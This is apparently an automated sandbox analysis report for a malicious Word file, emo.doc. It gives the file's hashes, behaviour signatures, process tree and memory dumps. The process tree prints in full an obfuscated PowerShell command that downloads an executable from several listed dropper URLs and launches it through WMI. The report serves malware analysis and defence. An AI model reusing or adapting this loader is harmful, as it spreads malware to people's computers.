Analysis

  • max time kernel
    143s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    30/05/2023, 17:56

General

  • Target

    emo.doc

  • Size

    205KB

  • MD5

    3079af4d01ee6ec51bd3d9911da7e23f

  • SHA1

    3ea711d020b52fb0490c359462451d4edd471e33

  • SHA256

    c578a9fc241658517a7346a2a60236c84f0bb4919b857db226150aab4093451e

  • SHA512

    4bfd70a75f7dc51439d6bd0a4ec083ca9ced847de7cdf242e6583b0c5c71ebba4df6d5c7781ecfe6213fce8b0f6446b6630d353c2038e6687cc18a559d537535

  • SSDEEP

    3072:evt3BDbKRPJivKie6B/w2yiWydh+bRevf1+l:evdlbKRPJiP/w2PCx

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://da-industrial.htb/js/9IdLP/

exe.dropper

http://daprofesional.htb/data4/hWgWjTV/

exe.dropper

https://dagranitegiare.htb/wp-admin/tV/

exe.dropper

http://www.outspokenvisions.htb/wp-includes/aWoM/

exe.dropper

http://mobsouk.htb/wp-includes/UY30R/

exe.dropper

http://biglaughs.htb/smallpotatoes/Y/

exe.dropper

https://ngllogistics.htb/adminer/W3mkB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emo.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1984
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -windowstyle hidden -ENCOD   S V     0 z X   ( [ T y P e ] ( " { 2 } { 0 } { 4 } { 3 } { 1 } " - f   ' e ' , ' r E C t o r Y ' , ' s Y s t ' , ' . I O . d I ' , ' M ' )     )   ;       s e t     T x y S e o     (     [ T Y p e ] ( " { 0 } { 7 } { 5 } { 6 } { 4 } { 2 } { 1 } { 8 } { 3 } " - F ' S Y s T E ' , ' T M ' , ' I N ' , ' E R ' , ' p O ' , ' N e T . s e ' , ' R V I C E ' , ' M . ' , ' A N a G ' ) )   ;     $ N b f 5 t g 3 = ( ' B 9 ' + ' y p ' + ( ' 9 0 ' + ' s ' ) ) ; $ V x n l r e 0 = $ C l u d k j x   +   [ c h a r ] ( 6 4 )   +   $ R 6 r 1 t u y ; $ K y 3 q 0 e 8 = ( ( ' R q ' + ' d x ' ) + ' w o ' + ' 5 ' ) ;     (     D i r     v a R i A b l e : 0 Z x ) . v a l u E : : " C r e A T ` E ` d I R E c ` T ` O r Y " ( $ H O M E   +   ( ( ( ' n D p ' + ' J r b ' ) + ( ' e ' + ' v k 4 n ' ) + ' D ' + ' p ' + ( ' C ' + ' c w r _ 2 h ' ) + ' n D ' + ' p ' )   - R e P l A c E   ( ' n ' + ' D p ' ) , [ c H a R ] 9 2 ) ) ; $ F N 5 g g m s H   =   ( 1 8 2 , 1 8 7 , 2 2 9 , 1 4 6 , 2 3 1 , 1 7 7 , 1 5 1 , 1 4 9 , 1 6 6 ) ; $ P y o z g e o = ( ( ' J 5 f ' + ' y 1 ' ) + ' c ' + ' c ' ) ;   (     v a R i A B L E   T x Y S E o     ) . V a l u E : : " S e c U r I ` T Y p ` R ` O t O c ` o l "   =   ( ( ' T l ' + ' s 1 ' ) + ' 2 ' ) ; $ F N 5 g g m s H   + =   ( 1 8 6 , 1 4 1 , 2 2 8 , 1 8 2 , 1 7 7 , 1 7 1 , 2 2 9 , 2 3 6 , 2 3 9 , 2 3 9 , 2 3 9 , 2 2 8 , 1 8 1 , 1 8 2 , 1 7 1 , 2 2 9 , 2 3 4 , 2 3 9 , 2 3 9 , 2 2 8 ) ; $ H u a j g b 0 = ( ( ' J n ' + ' o ' ) + ' 5 g ' + ' a 1 ' ) ; $ B b 2 8 u m o   =   ( ( ' A l e ' + ' 7 g ' ) + ' _ 8 ' ) ; $ H s c e _ j s = ( ' K v ' + ( ' n b ' + ' o v _ ' ) ) ; $ S p k 5 1 u e = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ S c u s b k j = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . e ' + ' x ' ) + ' e ' ) ; $ F N 5 g g m s H   + =   ( 1 8 5 , 1 7 9 , 1 9 0 , 1 8 4 , 2 2 9 , 1 5 1 , 1 3 9 , 1 5 7 , 1 6 4 , 2 3 5 , 1 7 7 , 2 3 9 , 1 7 1 , 1 8 3 , 2 3 6 , 1 4 1 , 1 2 8 , 1 8 7 , 2 3 5 , 1 3 4 , 1 2 8 , 1 5 8 , 1 7 7 , 1 7 6 , 1 3 9 ) ; $ h b m s k V 2 T = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ h b m s k V 2 T = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . c ' + ' o ' ) + ' n f ' ) ; $ Q 1 _ y 0 5 _ = ( ' W ' + ( ' 4 ' + ' q v y ' ) + ' z 8 ' ) ; $ O d b 3 h f 3 = & ( ' n ' + ' e ' + ' w - o b j e c t ' )   N e t . W E B c l I E N t ; $ F N 5 g g m s H   + =   ( 1 8 3 , 1 5 4 , 1 7 3 , 1 2 8 , 1 7 5 , 1 5 1 , 2 3 8 , 1 4 0 , 1 8 3 , 1 6 2 , 2 2 8 , 1 7 0 , 1 7 3 , 1 7 9 , 2 2 9 ) ; $ A n b y t 1 y = ( ' h ' + ( ' t t p : ' + ' ] [ ' + ' ( s ) ] ' ) + ( ( ' w ] ' + ' [ ( ' ) ) + ( ( ' s ) ' + ' ] w ' ) ) + ( ' d a ' + ' - ' ) + ' i ' + ' n ' + ' d u ' + ( ' s ' + ' t r i a l . ' + ' h ' + ' t ' ) + ' b ] ' + ( ' [ ( s ) ] ' + ' w ' + ' j s ' ) + ( ( ' ] ' + ' [ ( ' ) ) + ( ( ' s ' + ' ) ] w 9 I d L ' + ' P ] [ ' + ' ( s ' + ' ) ] w ' + ' @ h ' ) ) + ( ' t ' + ' t p : ] ' ) + ( ' [ ( s ' + ' ) ] ' ) + ' w ' + ( ' ] ' + ' [ ( s ) ] ' ) + ( ' w d a p ' + ' r o ' + ' f e s i o n a ' + ' l . h ' ) + ' t b ' + ( ' ] [ ( s ' + ' ) ' + ' ] ' ) + ' w ' + ( ' d ' + ' a t a ' ) + ( ' 4 ] [ ( s ' + ' ) ] w h ' ) + ( ' W g W ' + ' j T ' ) + ( ' V ] ' + ' [ ' ) + ( ' ( s ) ] w @ h t t p ' + ' s : ] [ ( s ' + ' ) ] ' + ' w ' + ' ] ' ) + ' [ ' + ( ' ( s ) ' + ' ] w d a g ' + ' r a ' ) + ' n i ' + ' t ' + ( ' e g ' + ' i a ' ) + ( ' r e . h ' + ' t ' ) + ' b ] ' + ( ' [ ' + ' ( s ) ' ) + ( ' ] w w ' + ' p - a ' + ' d m ' + ' i n ] [ ( s ) ' + ' ] w t ' ) + ( ' V ] [ ' + ' ( s ' + ' ) ' ) + ( ' ] w @ ' + ' h ' ) + ' t t ' + ' p ' + ( ' : ' + ' ] [ ' ) + ( ' ( s ) ] w ] [ ' + ' ( s ' + ' ) ] w w w ' + ' w ' + ' . o u t ' + ' s ' + ' p ' ) + ( ' o k ' + ' e ' ) + ' n v ' + ' i ' + ( ' s ' + ' i o n s . ' ) + ( ' h t b ' + ' ] ' ) + ' [ ' + ( ' ( s ) ] w ' + ' w p ' + ' - i n ' ) + ( ' c l u ' + ' d ' ) + ( ' e s ] [ ( s ) ' + ' ] w a W ' + ' o ' + ' M ' ) + ( ' ] ' + ' [ ( ' + ' s ) ] w ' ) + ( ' @ ' + ' h t t p : ] ' ) + ( ' [ ( s ) ' + ' ] w ] [ ( ' + ' s ) ' ) + ( ' ] w m o ' + ' b s ' ) + ( ' o ' + ' u k . h ' ) + ( ( ' t ' + ' b ] [ ( ' ) ) + ( ( ' s ) ' + ' ] w w p - ' ) ) + ' i n ' + ' c ' + ' l ' + ( ' u d e ' + ' s ] ' + ' [ ' ) + ( ' ( s ) ] ' + ' w ' ) + ( ' U Y ' + ' 3 0 R ] ' ) + ( ' [ ( s ' + ' ) ] w ' + ' @ ' + ' h ' + ' t t p : ] [ ' ) + ( ' ( ' + ' s ) ] w ' ) + ( ' ] [ ' + ' ( s ) ' ) + ( ' ] ' + ' w b ' ) + ' i ' + ( ' g ' + ' l a u g h ' + ' s ' ) + ( ( ' . h ' + ' t ' + ' b ] [ ( s ' ) ) + ( ( ' ) ] ' ) ) + ( ' w s ' + ' m a l l p o t ' + ' a t o ' ) + ' e s ' + ( ( ' ] ' + ' [ ( s ' ) ) + ( ( ' ) ] w Y ] ' + ' [ ( s ' + ' ) ] w ' + ' @ h ' + ' t t p s : ] [ ( s ) ' ) ) + ' ] w ' + ( ' ] [ ( ' + ' s ) ] w n ' + ' g ' ) + ( ' l l ' + ' o ' ) + ( ' g i s t ' + ' i ' ) + ( ' c s . ' + ' h ' ) + ' t ' + ( ' b ] ' + ' [ ' + ' ( ' + ' s ) ] w ' ) + ' a d ' + ( ' m i ' + ' n ' ) + ' e r ' + ' ] ' + ( ' [ ( s ' + ' ) ] w ' + ' W 3 m ' ) + ' k ' + ( ( ' B ' + ' ] [ ( s ' ) ) + ( ( ' ) ' + ' ] w ' ) ) ) . " r e p ` L A c E " ( ( ' ] ' + ' [ ' + ( ' ( s ) ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P ` l I T " ( $ I v g 3 z c u   +   $ V x n l r e 0   +   $ J z a e w d y ) ; $ G c o y v l v = ( ( ' K f ' + ' _ ' ) + ( ' 9 ' + ' e t 1 ' ) ) ; f o r e a c h   ( $ A 8 i 3 k e 1   i n   $ A n b y t 1 y ) { t r y { $ O d b 3 h f 3 . " d O ` W n L O A ` d f I L e " ( $ A 8 i 3 k e 1 ,   $ S c u s b k j ) ; $ Z h c n a u x = ( ( ' E k ' + ' k ' ) + ( ' j ' + ' 4 7 t ' ) ) ; I f   ( ( & ( ' G e t - I ' + ' t e ' + ' m ' )   $ S c u s b k j ) . " L E n ` G T h "   - g e   4 5 1 9 9 )   { $ { A 8 ` I ` 3 K E 1 } . ( " { 1 } { 2 } { 0 } "   - f ' a y ' , ' T o C h a ' , ' r A r r ' ) . I n v o k e ( )   |   . ( " { 2 } { 1 } { 0 } { 3 } "   - f ' - ' , ' a c h ' , ' F o r E ' , ' O b j e c t ' )   - p r o c e s s   {   $ { F N 5 ` G G m ` S h }   + =   ( [ b y t e ] [ c h a r ] $ { _ }   - b x o r   0 x d f   )   } ;   $ F N 5 g g m s H   + =   ( 2 2 8 ) ;   $ b 0 R j e   =     [ t y p e ] ( " { 1 } { 0 } "   - F ' V e r T ' , ' C o n ' ) ;       $ B 0 R j E : : " t O ` B a S ` E 6 4 S ` T R I ` N g " ( $ { f n 5 ` g g m ` s h } )   |   . ( " { 2 } { 1 } { 0 } "   - f   ' i l e ' , ' u t - f ' , ' o ' )   $ { h B ` m S K ` V 2 T } ;   ( [ w m i c l a s s ] ( ( ' w i ' + ' n ' ) + ( ' 3 2 _ ' + ' P r o c ' + ' e ' ) + ' s ' + ' s ' ) ) . " c R ` e a T E " ( $ S c u s b k j ) ; $ G l w k i 6 a = ( ' I ' + ' m ' + ( ' t d ' + ' x v 6 ' ) ) ; b r e a k ; $ P f p b l h 1 = ( ' V s ' + ( ' l a l ' + ' c ' ) + ' u ' ) } } c a t c h { } } $ F 4 7 i e f 2 = ( ( ' B n ' + ' z i d ' ) + ' r t ' ) 
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1344-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1344-59-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-60-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-61-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-62-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-63-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-64-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-65-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-66-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-67-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-69-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-70-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-71-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-72-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-68-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-74-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-75-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-76-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-77-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-73-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-78-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-80-0x00000000065C0000-0x00000000066C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-79-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-82-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-81-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-83-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-84-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-85-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-88-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-89-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-91-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-92-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1344-90-0x00000000002C0000-0x00000000003C0000-memory.dmp

      Filesize

      1024KB

    • memory/1648-98-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

      Filesize

      2.9MB

    • memory/1648-99-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

      Filesize

      32KB

    • memory/1648-100-0x0000000002940000-0x00000000029C0000-memory.dmp

      Filesize

      512KB

    • memory/1648-101-0x0000000002940000-0x00000000029C0000-memory.dmp

      Filesize

      512KB

    • memory/1648-102-0x0000000002940000-0x00000000029C0000-memory.dmp

      Filesize

      512KB